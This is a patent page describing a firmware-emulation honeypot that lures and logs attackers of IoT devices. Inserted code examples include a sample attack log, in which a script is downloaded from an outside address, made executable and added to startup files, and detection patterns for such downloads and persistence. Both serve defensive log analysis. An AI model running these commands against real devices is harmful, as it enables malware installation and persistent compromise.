CN112417444A - Attack trapping system based on firmware simulation - Google Patents


Info

Publication number
CN112417444A
Authority
CN
China
Prior art keywords
firmware
equipment
attack
information
simulation
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Withdrawn
Application number
CN202011393227.9A
Other languages
Chinese (zh)
Inventor
陈霄
肖甫
沙乐天
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Nanjing University of Posts and Telecommunications
Original Assignee
Nanjing University of Posts and Telecommunications
Application filed by Nanjing University of Posts and Telecommunications
Priority to CN202011393227.9A
Publication of CN112417444A

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55 Detecting local intrusion or implementing counter-measures
    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/566 Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
    • G06F21/57 Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
    • G06F21/577 Assessing vulnerabilities and evaluating computer system security

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Physics & Mathematics (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Computing Systems (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention relates to an attack trapping system based on firmware simulation, which comprises the following steps: (1) acquiring and analyzing firmware; (2) simulating the firmware information acquired in step 1 with the QEMU emulator using system-level simulation; (3) on the basis of step 2, building a honeypot system: deploying a high-interaction honeypot system based on an SSH (Secure Shell) proxy protocol in a virtualized environment and configuring its information; (4) on the basis of step 3, capturing attack behavior: monitoring the various attack behavior characteristics of the device in the honeypot in real time and capturing information such as the attack path taken by the attacker. According to the invention, the firmware is emulated with the QEMU simulator and an SSH-based honeypot environment is deployed using virtualization technology, so that various attack behaviors aimed at the device can be effectively monitored in real time, malicious attacks are captured, and a more efficient and complete system security protection system is constructed.

Description

Attack trapping system based on firmware simulation
Technical Field
The invention belongs to the technical field of computer security, relates in particular to computer device firmware, emulators and honeypot technology, and specifically relates to an attack trapping system based on firmware simulation.
Background
With the rapid development of the Internet of Things and the wide adoption of embedded devices, more and more embedded devices are connected through networks, and a user can control any networked embedded device from anywhere through a mobile phone or PC; for example, a person can connect a mobile phone to a network camera at home or in the office at any time to check whether appliances have been switched off or whether a thief has broken in. Embedded devices have many different processor architectures and functions, which makes their security analysis complex and demanding in terms of specialist knowledge, and security awareness among users is still weak, so security research on embedded devices is currently progressing slowly.
The security of embedded Internet of Things devices deserves serious attention. In September 2016, embedded IoT devices in many regions of the United States were used in a large-scale DDoS attack caused by the botnet malware Mirai. Mirai infects embedded devices such as network cameras, routers and wireless printers, breaks in and takes control using a number of known and undisclosed vulnerabilities, then infects other embedded devices over the Internet; at the peak of the outbreak, hundreds of thousands of embedded devices were controlled to carry out a distributed denial of service (DDoS) attack. Many major US websites, including Amazon, Spotify and Twitter, were hit by the attack and rendered inaccessible. Dyn, the company that provides domain name resolution for these Internet businesses, also suffered a large-scale DDoS attack in October, leaving multiple websites and online services unreachable; this attack is also known as the "East Coast outage". In May 2017, the new WannaCry ransomware broke out worldwide. It attacks through port 445, which is open by default on Windows systems, by means of the high-risk "EternalBlue" vulnerability, and replicates and propagates itself by scanning the ports of other machines on the same network segment. It spread rapidly in a short time, infecting at least 30 million machines in hundreds of countries, with losses amounting to $80 million. In May 2018, the Cisco security team disclosed VPNFilter, a highly scalable and highly destructive piece of malware that can brick a device to cover its tracks and monitor the device's traffic to steal user information. The devices attacked by this malware are mostly networked network and storage devices; according to statistics, VPNFilter has infected a total of 50 Internet of Things devices in at least 50 countries.
Judging from the scope of influence and frequency of these major vulnerability attack events, accelerating reverse engineering and vulnerability analysis of Internet of Things devices helps the transformation and upgrading of traditional industries, promotes the development of the global Internet of Things, and is of great significance to national information security, network data protection and personal information protection.
There are many online device scanning services, such as Shodan and Censys, that scan all online devices on the Internet and provide the device details obtained by the scan. Such easy-to-use research tools let security researchers identify exposed or reachable embedded IoT devices more efficiently and quickly. The disadvantage of such Internet-wide scanning, however, is that vulnerability scanning can only be performed against ports the embedded device has open; a device with no open ports, or one that is not networked at all, cannot be analyzed. Because embedded IoT devices come in many types with many functions and their firmware contains a variety of security vulnerabilities, security research on them is very difficult, and they face a larger attack surface and more frequent attacks. Device manufacturers are not proactive about security testing and updating of firmware, users cannot readily upgrade the firmware after purchasing a device, and once a vulnerability is found in the firmware of a given embedded device, the security of millions of users can be affected.
Attacks on embedded IoT devices not only compromise the security of the device itself but also threaten the stability of the whole computer system. The internal structure and operating principles of IoT devices therefore need further study: starting from the device firmware, the state of the device when facing various attack behaviors is studied, malicious attacks are captured and the attack path is analyzed, so as to further maintain the security and stability of the whole computer system.
Disclosure of Invention
Aiming at the system security problems that have kept appearing in recent years, the invention provides an attack trapping system based on firmware simulation. Device firmware is acquired and its characteristic information analyzed by combining static and dynamic analysis, the QEMU emulator is used to simulate the environment the target firmware requires, a honeypot system is deployed in a virtualized environment, attack behavior is monitored and captured effectively in real time, the system's ability to defend against various attack behaviors is improved, and a safer and more reliable system security protection system is constructed.
In order to achieve this purpose, the invention is realized by the following technical scheme:
The invention relates to an attack trapping system based on firmware simulation, which traps attack behavior from the perspective of firmware simulation and comprises the following steps:
step 1: acquire and analyze the firmware: obtain firmware information from the device manufacturer's official website, or read the firmware storage chip directly through hardware access, bypassing the device's controller or processor, controlling the device's Flash chip directly and reading out the entire contents of the chip; then analyze the binary data of the firmware;
step 2: simulate the target firmware using the QEMU emulator and system-level simulation, based on the firmware information acquired in step 1;
step 3: on the basis of step 2, construct a honeypot system: deploy a high-interaction honeypot system based on an SSH (Secure Shell) proxy protocol in a virtualized environment and configure its information;
step 4: on the basis of step 3, capture attack behavior: monitor the various attack behavior characteristics of the device in the honeypot in real time and capture information such as the attack path taken by the attacker.
The invention is further improved in that in step 1, the firmware is acquired and analyzed: firmware information is obtained from the device manufacturer's official website, or the firmware storage chip is read directly through hardware access, bypassing the device's controller (or processor), controlling the device's Flash chip directly and reading out the entire contents of the chip, and the binary data of the firmware is analyzed, specifically:
(1) firmware acquisition: download the firmware archive from the official website provided by the device manufacturer using a web crawler; for firmware with no download page, read the firmware storage chip directly through hardware access, bypassing the device's controller, controlling the device's Flash chip directly and reading out the entire contents of the chip; integrate and classify all collected firmware, and organize it into folders by device brand, device type, device model and similar information to simplify unified management later;
(2) firmware analysis: embedded device firmware is a binary program stored in an EEPROM or Flash chip. It contains all the executable programs and configuration files of the embedded device, is the core of the device and determines its functions and performance; firmware is therefore software, not hardware. Analysis of a large number of embedded device firmware images shows that such firmware mainly consists of four parts: header information (Header), a boot loader (BootLoader), a kernel image (Image) and a root file system (Root file system). The firmware header is parsed and the data structure of the whole firmware is learned from the header format; a database of characteristic values is built by analyzing the characteristic fields of various types of firmware. After the binary data of the embedded IoT device firmware has been parsed, the corresponding characteristic field is located from the header information and its offset, and the basic information of the firmware is identified. After firmware images from several manufacturers and for several processor architectures have been analyzed, the firmware is decompressed and decompiled, its binary data is inspected, and characteristic values are generated from the offset and field size of each characteristic field. The third-party firmware analysis tool Binwalk is then used for a preliminary analysis of the firmware type, the firmware is classified and stored in a database according to the system architecture it runs on and its file format, and finally a complete table of firmware characteristic values for embedded IoT devices is established.
The invention is further improved in that in step 2, the target firmware is simulated using the QEMU emulator and system-level simulation on the firmware information obtained in step 1, specifically:
step 2-1: study the table of embedded IoT device firmware characteristic values collected and integrated in step 1 in more detail; compare the advantages and disadvantages of the application-level, process-level and system-level simulation used in existing dynamic simulation techniques, select system-level simulation as the simulation environment of the firmware dynamic analysis platform according to the firmware characteristic value table, simulate all interfaces of the hardware device, and rapidly reproduce a realistic firmware operating environment;
step 2-2: install the QEMU emulator on the host, select the components suited to the firmware version, set the emulator parameters, and run a simple test with some firmware to ensure the emulator operates normally;
step 2-3: mount the root file system extracted from the firmware, then perform full-system dynamic simulation of the kernel with QEMU, scanning and tracking the system configuration files during the simulation to infer and adjust the network configuration parameters of the firmware environment.
The invention is further improved in that in step 3, on the basis of step 2, a honeypot system is built: a high-interaction honeypot system based on the SSH proxy protocol is deployed in a virtualized environment and its information configured, specifically:
(3-1) create a user, confirm all of its information and confirm its password;
(3-2) configure the honeypot accordingly by changing its configuration files;
(3-3) create a fake file system that supports adding and deleting files; the fake file system contains the complete firmware file system, so that the attacker is given the opportunity to add and delete fake files in it, and at the same time some existing vulnerabilities are added to the device firmware to trap the attacker. The system supports SSH and Telnet proxies and monitors the attacker's accesses.
The invention is further improved in that in step 4, on the basis of step 3, attack behavior is captured: the various attack behavior characteristics of the device in the honeypot are monitored in real time and information such as the attack path taken by the attacker is captured, specifically:
step 4-1: collect vulnerability information on IoT devices of different types and models from network data or experimental data, establish a complete vulnerability exploitation database, and extract characteristic information that summarizes the vulnerabilities;
step 4-2: monitor the access traffic of the device in the honeypot in real time and compare key data against the database synchronously; for a known vulnerability that already exists, analyze the state of the device when the vulnerability is triggered and match the corresponding attack behavior promptly. When an attacker accesses SSH, as soon as a login event occurs all of the attacker's operations are recorded in the logging system and synchronously written to a MySQL database to facilitate later backtracking; in addition, the attacker's attack path is obtained from the relevant log information in the honeypot and high-interaction operations are performed promptly, ensuring the concealment and continuity of the system;
step 4-3: by combining the analysis results of steps 4-1 and 4-2, determine the attack behaviors suffered by devices of different types and models and the paths taken by attackers, research corresponding solutions from the perspective of the system, improve the system's ability to defend against various attack behaviors and construct a safer and more reliable system security protection system.
The invention has the following beneficial effects:
(1) The method starts from the device firmware. It collects, sorts and summarizes device firmware through different firmware search modes, ensuring that firmware coverage is complete enough; it analyzes binary data such as the firmware's processor architecture, instruction set and file format, establishes a firmware characteristic value table, identifies the system type and file format in the firmware from that table, parses the firmware according to its processor architecture and data storage layout, and obtains the kernel and root file system from the firmware. Compared with other approaches this is closer to the lowest layer of the device and can analyze every aspect of the device more deeply, which makes attack trapping more efficient and complete.
(2) The method takes the angle of firmware simulation and uses QEMU, a full-featured processor emulator that is transparent to the underlying hardware architecture when simulating firmware: it supports not only x86 but also device simulation for the ARM and MIPS architectures, and allows convenient cross-compilation and dynamic debugging of various devices. In addition, QEMU uses dynamic binary translation to translate the binary instructions of the simulated environment, and caches and reuses translated instructions, which improves simulation efficiency; this saves security staff time and effort, is simple to operate, and simulates better and faster than other approaches.
(3) The method deploys a high-interaction honeypot system that gives attackers enough to do that the information recorded is sufficiently comprehensive; the system hides itself as far as possible and can monitor and capture persistently. In addition, the honeypot records the attacker's operations in a logging system and a database in real time, making later behavior analysis, path retrieval, vulnerability mining and so on more efficient.
Drawings
FIG. 1 is an overall flow chart of the present invention.
FIG. 2 is a block diagram of the firmware acquisition and parsing in the present invention.
FIG. 3 is a block diagram of a QEMU-based simulation of firmware in the present invention.
FIG. 4 is a block diagram of the structure of an attack behavior trap in the present invention.
Detailed Description
In the following description, for purposes of explanation, numerous implementation details are set forth in order to provide a thorough understanding of the embodiments of the invention. It should be understood, however, that these implementation details are not to be interpreted as limiting the invention. That is, in some embodiments of the invention, such implementation details are not necessary.
As shown in FIGS. 1-4, the present invention is an attack trapping system based on firmware simulation, which traps attack behavior from the perspective of firmware simulation and comprises the following steps:
step 1: acquire and analyze the firmware: firmware information is obtained from the device manufacturer's official website, or the firmware storage chip is read directly through hardware access, bypassing the device's controller or processor, controlling the device's Flash chip directly and reading out the entire contents of the chip, and the binary data of the firmware is analyzed; as shown in FIG. 2, this specifically comprises the following steps:
(1) firmware acquisition: download the firmware archive from the official website provided by the device manufacturer using a web crawler; for firmware with no download page, read the firmware storage chip directly through hardware access, bypassing the device's controller, controlling the device's Flash chip directly and reading out the entire contents of the chip; integrate and classify all collected firmware, and organize it into folders by device brand, device type, device model and similar information to simplify unified management later;
(2) firmware analysis: embedded device firmware is a binary program stored in an EEPROM or Flash chip. It contains all the executable programs and configuration files of the embedded device, is the core of the device and determines its functions and performance; firmware is therefore software, not hardware. Analysis of a large number of embedded device firmware images shows that such firmware mainly consists of four parts: header information (Header), a boot loader (BootLoader), a kernel image (Image) and a root file system (Root file system). The firmware header is parsed and the data structure of the whole firmware is learned from the header format; a database of characteristic values is built by analyzing the characteristic fields of various types of firmware. After the binary data of the embedded IoT device firmware has been parsed, the corresponding characteristic field is located from the header information and its offset, and the basic information of the firmware is identified. After firmware images from several manufacturers and for several processor architectures have been analyzed, the firmware is decompressed and decompiled, its binary data is inspected, and characteristic values are generated from the offset and field size of each characteristic field. The third-party firmware analysis tool Binwalk is then used for a preliminary analysis of the firmware type, the firmware is classified and stored in a database according to the system architecture it runs on and its file format, and finally a complete table of firmware characteristic values for embedded IoT devices is established.
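As an added illustration of the header-and-offset analysis in step 1 (example code written for this page, not the patent's own implementation), the following parser keeps a small characteristic-field table for the U-Boot uImage header and the SquashFS superblock, scans a firmware blob for those fields, and reads the architecture and compression out of the header to classify the image. The sample blob is constructed inside the block and is not a real firmware image.

```python
"""Firmware header parsing and characteristic-value extraction (step 1).

Added example, not code from the patent. It keeps a table of characteristic
fields (magic bytes and the structure's endianness) for the U-Boot uImage
header and the SquashFS superblock, scans a blob for them, and reads the
architecture and compression fields out of the uImage header so the image
can be classified as the text describes. The sample blob is constructed.
"""
import struct
from dataclasses import dataclass

# U-Boot legacy image header, 64 bytes, big-endian (layout from U-Boot's image.h):
# magic, header crc, timestamp, payload size, load addr, entry point, payload crc,
# then os, arch, image type, compression (one byte each) and a 32-byte name.
UIMAGE_MAGIC = 0x27051956
UIMAGE_HEADER = struct.Struct(">7I4B32s")
UIMAGE_ARCH = {2: "arm", 3: "x86", 5: "mips", 22: "arm64"}
UIMAGE_COMP = {0: "none", 1: "gzip", 2: "bzip2", 3: "lzma", 4: "lzo"}

# Characteristic field table: name -> (magic bytes, endianness of the structure).
SIGNATURES = {
    "uimage":      (b"\x27\x05\x19\x56", "big"),
    "squashfs-le": (b"hsqs", "little"),
    "squashfs-be": (b"sqsh", "big"),
}

@dataclass
class FirmwareInfo:
    arch: str
    compression: str
    kernel_offset: int
    kernel_size: int
    rootfs_offset: int
    rootfs_type: str
    endianness: str

def scan_signatures(blob):
    """Return [(offset, name)] for every characteristic field in blob, sorted by offset."""
    hits = []
    for name, (magic, _) in SIGNATURES.items():
        start = 0
        while (pos := blob.find(magic, start)) != -1:
            hits.append((pos, name))
            start = pos + 1
    return sorted(hits)

def parse_uimage(blob, offset):
    """Decode the uImage header at offset into (arch, compression, payload size)."""
    if offset + UIMAGE_HEADER.size > len(blob):
        raise ValueError("truncated uImage header")
    fields = UIMAGE_HEADER.unpack_from(blob, offset)
    magic, _hcrc, _time, size, _load, _ep, _dcrc, _os, arch, _type, comp, _name = fields
    if magic != UIMAGE_MAGIC:
        raise ValueError("not a uImage header")
    return (UIMAGE_ARCH.get(arch, f"unknown({arch})"),
            UIMAGE_COMP.get(comp, f"unknown({comp})"), size)

def analyze_firmware(blob):
    """Produce the characteristic-value record that step 1 stores per firmware image."""
    hits = scan_signatures(blob)
    kernels = [pos for pos, name in hits if name == "uimage"]
    rootfs = [(pos, name) for pos, name in hits if name.startswith("squashfs")]
    if not kernels or not rootfs:
        raise ValueError(f"unrecognised layout, signatures found: {hits}")
    k_off = kernels[0]
    arch, comp, size = parse_uimage(blob, k_off)
    r_off, r_name = rootfs[0]
    # A root file system must start past the kernel payload; a hit inside it is a false positive.
    if r_off < k_off + UIMAGE_HEADER.size + size:
        raise ValueError("root file system signature overlaps the kernel payload")
    return FirmwareInfo(arch, comp, k_off, size, r_off, "squashfs", SIGNATURES[r_name][1])

def build_sample_firmware():
    """Constructed sample: gzip-compressed MIPS Linux kernel in a uImage wrapper,
    padded to a 4 KiB boundary, followed by a little-endian SquashFS superblock."""
    payload = b"\x00" * 200
    # os=5 (linux), arch=5 (mips), type=2 (kernel), comp=1 (gzip); name is padded by struct.
    header = UIMAGE_HEADER.pack(UIMAGE_MAGIC, 0, 0, len(payload), 0x80000000, 0x80000000, 0,
                                5, 5, 2, 1, b"Linux-constructed")
    kernel = header + payload
    padding = b"\xff" * (4096 - len(kernel))
    return kernel + padding + b"hsqs" + b"\x00" * 92   # superblock magic plus placeholder fields
```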
Step 2: simulate the target firmware using the QEMU emulator and system-level simulation on the firmware information acquired in step 1; as shown in FIG. 3, specifically:
step 2-1: study the table of embedded IoT device firmware characteristic values collected and integrated in step 1 in more detail; compare the advantages and disadvantages of the application-level, process-level and system-level simulation used in existing dynamic simulation techniques, select system-level simulation as the simulation environment of the firmware dynamic analysis platform according to the firmware characteristic value table, simulate all interfaces of the hardware device, and rapidly reproduce a realistic firmware operating environment;
step 2-2: install the QEMU emulator on the host, select the components suited to the firmware version, set the emulator parameters, and run a simple test with some firmware to ensure the emulator operates normally;
step 2-3: mount the root file system extracted from the firmware, then perform full-system dynamic simulation of the kernel with QEMU, scanning and tracking the system configuration files during the simulation to infer and adjust the network configuration parameters of the firmware environment.
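The inference of network parameters in step 2-3, as an added example (written for this page, not the patent's own code): it scans the extracted root file system's init scripts and interfaces file for the interface/IP assignments the firmware makes at boot, picks a host-side tap address on the same subnet, and assembles a QEMU full-system command line for the architecture found in step 1. The QEMU profiles (machine type, NIC model, root device, console), the tap name and the sample root file system are assumptions constructed for the example.

```python
"""Step 2-3 helper: infer a firmware's network configuration from its extracted
root file system and plan the matching QEMU full-system emulation.

Added example, not code from the patent. Machine types, NIC models and the
sample root file system below are assumptions chosen for the example.
"""
import ipaddress
import re
import tempfile
from pathlib import Path

# 'ifconfig br0 192.168.1.1 ...' in init scripts, and interfaces(5)-style stanzas.
IFCONFIG_RE = re.compile(r"\bifconfig\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})")
IFACE_RE = re.compile(r"^\s*iface\s+(\S+)\s+inet\s+static", re.M)
ADDRESS_RE = re.compile(r"^\s*address\s+(\d{1,3}(?:\.\d{1,3}){3})", re.M)
CONFIG_GLOBS = ("etc/init.d/*", "etc/rc.d/*", "etc/*.sh", "etc/network/interfaces")

# (arch, endianness) -> (binary, machine, NIC model, root device, console); assumed profiles.
QEMU_PROFILES = {
    ("mips", "big"):    ("qemu-system-mips",   "malta", "pcnet",             "/dev/sda1", "ttyS0"),
    ("mips", "little"): ("qemu-system-mipsel", "malta", "pcnet",             "/dev/sda1", "ttyS0"),
    ("arm", "little"):  ("qemu-system-arm",    "virt",  "virtio-net-device", "/dev/vda1", "ttyAMA0"),
}

def infer_network_config(rootfs):
    """Return {interface: ip} found in the firmware's boot-time configuration files."""
    found = {}
    for pattern in CONFIG_GLOBS:
        for path in sorted(Path(rootfs).glob(pattern)):
            if not path.is_file():
                continue
            text = path.read_text(errors="replace")
            for iface, ip in IFCONFIG_RE.findall(text):
                found.setdefault(iface, ip)
            for m in IFACE_RE.finditer(text):  # stanza, then the first following address line
                addr = ADDRESS_RE.search(text, m.end())
                if addr:
                    found.setdefault(m.group(1), addr.group(1))
    return found

def host_tap_address(guest_ip, prefix=24):
    """Pick a host address on the guest's subnet (assumed /24) that is not the guest's own."""
    net = ipaddress.ip_interface(f"{guest_ip}/{prefix}").network
    for host in net.hosts():
        if str(host) != guest_ip:
            return str(host)
    raise ValueError("no free host address on the guest subnet")

def plan_emulation(rootfs, arch, endianness, kernel, disk, tap="tap0"):
    """Combine the inferred network settings with the step-1 architecture into a launch plan."""
    if (arch, endianness) not in QEMU_PROFILES:
        raise ValueError(f"no emulation profile for {arch}/{endianness}")
    binary, machine, nic, rootdev, console = QEMU_PROFILES[(arch, endianness)]
    netconf = infer_network_config(rootfs)
    iface, guest_ip = next(iter(netconf.items()), (None, None))
    drive = f"file={disk},format=raw" + (",if=none,id=hd0" if machine == "virt" else "")
    argv = [binary, "-M", machine, "-nographic", "-kernel", str(kernel), "-drive", drive,
            "-append", f"root={rootdev} console={console} rw",
            "-netdev", f"tap,id=net0,ifname={tap},script=no,downscript=no",
            "-device", f"{nic},netdev=net0"]
    if machine == "virt":  # the virt board needs an explicit virtio block device
        argv += ["-device", "virtio-blk-device,drive=hd0"]
    host_cmds = []
    if guest_ip:  # put the host end of the tap on the subnet the firmware expects
        host_cmds = [f"ip addr add {host_tap_address(guest_ip)}/24 dev {tap}",
                     f"ip link set {tap} up"]
    return {"argv": argv, "guest_iface": iface, "guest_ip": guest_ip, "host_cmds": host_cmds}

def build_sample_rootfs():
    """Constructed root file system: a typical busybox init script plus an interfaces file."""
    root = Path(tempfile.mkdtemp(prefix="fw-rootfs-"))
    (root / "etc/init.d").mkdir(parents=True)
    (root / "etc/network").mkdir(parents=True)
    (root / "etc/init.d/rcS").write_text(
        "#!/bin/sh\nbrctl addbr br0\nifconfig br0 192.168.1.1 netmask 255.255.255.0 up\n")
    (root / "etc/network/interfaces").write_text(
        "auto eth1\niface eth1 inet static\n    address 10.0.0.5\n    netmask 255.255.255.0\n")
    return root
```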
Step 3: on the basis of step 2, construct a honeypot system: deploy a high-interaction honeypot system based on an SSH (Secure Shell) proxy protocol in a virtualized environment and configure its information. In the virtualized environment, the high-interaction honeypot system is built on the SSH proxy protocol as follows:
(3-1) create a user, confirm all of its information and confirm its password;
(3-2) configure the honeypot accordingly by changing its configuration files;
(3-3) create a fake file system that supports adding and deleting files; the fake file system contains the complete firmware file system, so that the attacker is given the opportunity to add and delete fake files in it, and at the same time some existing vulnerabilities are added to the device firmware to trap the attacker. The system supports SSH and Telnet proxies and monitors the attacker's accesses.
Step 4: on the basis of step 3, capture attack behavior: monitor the various attack behavior characteristics of the device in the honeypot in real time and capture information such as the path by which the attacker launched the attack; as shown in FIG. 4, specifically:
step 4-1: collect vulnerability information on IoT devices of different types and models from network data or experimental data, establish a complete vulnerability exploitation database, and extract characteristic information that summarizes the vulnerabilities;
step 4-2: monitor the access traffic of the device in the honeypot in real time and compare key data against the database synchronously; for a known vulnerability that already exists, analyze the state of the device when the vulnerability is triggered and match the corresponding attack behavior promptly. When an attacker accesses SSH, as soon as a login event occurs all of the attacker's operations are recorded in the logging system and synchronously written to a MySQL database to facilitate later backtracking; in addition, the attacker's attack path is obtained from the relevant log information in the honeypot and high-interaction operations are performed promptly, ensuring the concealment and continuity of the system;
step 4-3: by combining the analysis results of steps 4-1 and 4-2, determine the attack behaviors suffered by devices of different types and models and the paths taken by attackers, research corresponding solutions from the perspective of the system, improve the system's ability to defend against various attack behaviors and construct a safer and more reliable system security protection system.
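The logging and matching of step 4-2 against the feature table of step 4-1, as an added example (written for this page, not the patent's own code): honeypot session log lines are parsed into per-session attack paths, each path is matched against a table of behavior characteristics, and the result is stored as one row per session. The log format, the feature table and the sample sessions are constructed for the example, and sqlite3 stands in for the MySQL store the text describes so the block runs offline.

```python
"""Step 4-2 helper: turn honeypot SSH session logs into attack-path records and
match them against a table of attack behavior characteristics (step 4-1).

Added example, not code from the patent. The log format, the feature table
and the sample log are constructed; sqlite3 stands in for MySQL.
"""
import re
import sqlite3
from collections import defaultdict

# key=value pairs; values may be double-quoted (constructed log format).
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

# Constructed feature table: (tag, pattern over a recorded command, description).
FEATURE_TABLE = [
    ("recon-cpuinfo",  r"cat\s+/proc/cpuinfo", "architecture fingerprinting before payload choice"),
    ("drop-to-tmp",    r"\b(wget|curl|tftp)\b.*\s/(tmp|var/run|dev/shm)/", "download into scratch dir"),
    ("exec-dropped",   r"chmod\s+(\+x|[0-7]{3,4})\s+/tmp/", "marking a dropped file executable"),
    ("persistence-rc", r">>?\s*/etc/(rc\.local|init\.d/)", "appending to startup scripts"),
]

def parse_line(line):
    """Parse one log line into a dict; the leading token is the timestamp."""
    ts, _, rest = line.strip().partition(" ")
    fields = {"ts": ts}
    for key, raw, quoted in KV_RE.findall(rest):
        fields[key] = quoted if raw.startswith('"') else raw
    return fields

def build_sessions(lines):
    """Group events by session id and reconstruct each attacker's path of operations."""
    sessions = defaultdict(lambda: {"src": None, "user": None, "login_ok": False, "path": []})
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        s = sessions[ev["sess"]]
        s["src"] = ev.get("src", s["src"])
        if ev.get("event") == "login":
            s["user"] = ev.get("user")
            s["login_ok"] = s["login_ok"] or ev.get("result") == "success"
            s["path"].append(f"login({ev.get('user')}:{ev.get('result')})")
        elif ev.get("event") == "command":
            s["path"].append(ev.get("cmd", ""))
    return dict(sessions)

def match_features(session):
    """Return the feature tags whose pattern matches any step of the session's path."""
    tags = []
    for tag, pattern, _desc in FEATURE_TABLE:
        rx = re.compile(pattern)
        if any(rx.search(step) for step in session["path"]):
            tags.append(tag)
    return tags

def store_sessions(sessions, conn):
    """Write one row per session (stand-in for the MySQL table); returns the row count."""
    conn.execute("CREATE TABLE IF NOT EXISTS attack_path (sess TEXT PRIMARY KEY, src TEXT, "
                 "user TEXT, login_ok INTEGER, path TEXT, features TEXT)")
    for sid, s in sessions.items():
        conn.execute("INSERT OR REPLACE INTO attack_path VALUES (?,?,?,?,?,?)",
                     (sid, s["src"], s["user"], int(s["login_ok"]),
                      " -> ".join(s["path"]), ",".join(match_features(s))))
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM attack_path").fetchone()[0]

def process_log(lines):
    """End to end: parse, match and store; returns ({sess: tags}, stored row count)."""
    sessions = build_sessions(lines)
    conn = sqlite3.connect(":memory:")
    count = store_sessions(sessions, conn)
    return {sid: match_features(s) for sid, s in sessions.items()}, count

# Constructed sample log (documentation address ranges, not real hosts).
SAMPLE_LOG = """\
2024-01-01T10:00:01Z sess=a1 src=203.0.113.7 event=login user=admin result=success
2024-01-01T10:00:03Z sess=a1 src=203.0.113.7 event=command cmd="cat /proc/cpuinfo"
2024-01-01T10:00:05Z sess=a1 src=203.0.113.7 event=command cmd="wget http://198.51.100.9/x.sh -O /tmp/x.sh"
2024-01-01T10:00:06Z sess=a1 src=203.0.113.7 event=command cmd="chmod +x /tmp/x.sh"
2024-01-01T10:00:07Z sess=a1 src=203.0.113.7 event=command cmd="echo /tmp/x.sh >> /etc/rc.local"
2024-01-01T10:02:00Z sess=b2 src=203.0.113.8 event=login user=root result=failed
2024-01-01T10:02:01Z sess=b2 src=203.0.113.8 event=login user=root result=failed
"""
```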
The system acquires the device firmware and analyzes its characteristic information by combining static and dynamic analysis, simulates the environment required by the target firmware with the QEMU emulator, monitors and captures attack behavior effectively in real time by deploying the honeypot system in the virtualized environment, improves the system's ability to defend against various attack behaviors, and constructs a safer and more reliable system security protection system.
The above description is only an embodiment of the present invention, and is not intended to limit the present invention. Various modifications and alterations to this invention will become apparent to those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the scope of the claims of the present invention.

Claims (5)

1. An attack trapping system based on firmware simulation, which traps attack behaviors from the perspective of firmware simulation, characterized in that the system comprises the following steps:
step 1: firmware acquisition and analysis: obtaining the firmware from the device's official website, or reading the firmware storage chip directly through hardware access by bypassing the device's controller, driving the device's Flash chip directly and reading out the entire contents of the chip; then analyzing the binary data of the firmware;
step 2: simulating the target firmware with the QEMU emulator and system-level simulation techniques, using the firmware information acquired in step 1;
step 3: on the basis of step 2, constructing a honeypot system: deploying a high-interaction honeypot system based on the SSH (Secure Shell) proxy protocol in the virtualized environment and configuring its information;
step 4: on the basis of step 3, capturing attack behavior: monitoring in real time the various attack behavior characteristics against the device in the honeypot, and capturing information such as the means by which an attacker launches the attack.
2. The attack trapping system according to claim 1, wherein step 1 specifically comprises the following steps:
(1) firmware acquisition: downloading the firmware archive from the official website provided by the device manufacturer using a web crawler; for firmware with no download page, choosing to read the firmware storage chip directly through hardware access, bypassing the device's controller, driving the device's Flash chip directly and reading out the entire contents of the chip;
(2) firmware analysis: parsing the header information of the firmware and learning the data structure of the whole firmware from the header format; building a characteristic value database by analyzing the characteristic fields of the various firmware types; after parsing the binary data of the embedded Internet of Things device firmware, locating the corresponding characteristic fields from the header information and offsets and identifying the basic information of the firmware; after analyzing firmware images from several manufacturers and processor architectures, decompressing and decompiling the firmware, inspecting its binary data, and generating a characteristic value from the offset and field size of each characteristic field; then using the third-party firmware analysis tool Binwalk for a preliminary analysis of the firmware type, classifying and storing the firmware in the database according to the system architecture it runs on and its file format, and finally building a complete characteristic value data table of embedded Internet of Things device firmware.
3. The attack trapping system according to claim 1, wherein step 2 specifically comprises the following steps:
step 2-1: studying in more detail the characteristic value data table of embedded Internet of Things device firmware collected and integrated in step 1;
step 2-2: installing the QEMU emulator on a host, selecting the components suited to the firmware version, setting the emulator's parameters, and running a simple test with some firmware information to ensure that the emulator operates normally;
step 2-3: mounting the root file system extracted from the firmware, then performing full-system dynamic emulation of the kernel with QEMU.
4. The attack trapping system according to claim 1, wherein step 3 builds a high-interaction honeypot system based on the SSH proxy protocol in the virtualized environment, specifically:
(3-1) creating a user, confirming all of its information and confirming its password;
(3-2) configuring the honeypot accordingly by changing its configuration files;
(3-3) creating a fake file system that supports adding and deleting files; the fake file system contains the complete firmware file system, and the attacker is given the possibility of adding and deleting fake files within it.
5. The attack trapping system according to claim 1, wherein step 4 specifically comprises the following steps:
step 4-1: collecting vulnerability information on Internet of Things devices of different types and models from network data or experimental data, building a complete vulnerability exploitation database, and extracting and summarizing the characteristic information of the vulnerabilities;
